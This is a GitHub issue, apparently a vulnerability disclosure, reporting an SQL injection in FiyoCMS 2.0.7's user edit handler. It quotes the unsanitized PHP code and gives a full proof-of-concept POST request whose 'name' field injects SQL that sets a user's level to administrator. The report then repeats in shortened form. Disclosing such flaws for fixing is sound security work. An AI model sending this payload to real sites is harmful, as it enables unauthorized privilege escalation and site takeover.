You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Good day.
I found an update type of SQL injection vulnerability in the FiyoCMS 2.0.7.This vulnerability can lead to normal user privileges elevated to administrator privileges.
the vulnerability lies in /apps/app_user/sys_user.php
if(isset($_POST['edit'])){
if(!empty($_POST['email']) AND @ereg("^.+@.+\\..+$",$_POST['email']))
{
$qrq = false;
$_POST['bio'] = htmlentities($_POST['bio']);
if(empty($_POST['password']) AND empty($_POST['kpassword'])){
$qrq=$db->update(FDBPrefix.'user',array(
"name"=>"$_POST[name]",
"email"=>"$_POST[email]",
"about"=>"$_POST[bio]"),
"id=$_SESSION[USER_ID]");
}
it can be noticed that these two parameters $_POST[name] $_POST[email] were taken directly into the database query.
poc
POST /www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit HTTP/1.1
Host: 127.0.0.1
Content-Length: 139
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15f6d54e23f539-0723e5e4ddab84-5c153e17-100200-15f6d54e240a17; CNZZDATA1260798858=709893868-1509454193-http%253A%252F%252F127.0.0.1%252F%7C1509803835; PHPSESSID=8d82fdb9a681a4b55ed56fcf8df8fe42
Connection: close
password=&kpassword=&name=xm001",`email`="xxxx@gmail.com",`about`="test",level=1 WHERE id=2%23&email=xxxxx%40gmail.com&bio=wers&edit=Simpan
then you can get into Backstage
I hope you can fix it as soon as possible,if there are any questions, please send me the details to my email at xm001test@gmail.com
The text was updated successfully, but these errors were encountered:
Good day.
I found an update type of SQL injection vulnerability in the FiyoCMS 2.0.7.This vulnerability can lead to normal user privileges elevated to administrator privileges.
the vulnerability lies in /apps/app_user/sys_user.php
it can be noticed that these two parameters $_POST[name] $_POST[email] were taken directly into the database query.
poc
then you can get into Backstage
I hope you can fix it as soon as possible,if there are any questions, please send me the details to my email at xm001test@gmail.com
The text was updated successfully, but these errors were encountered: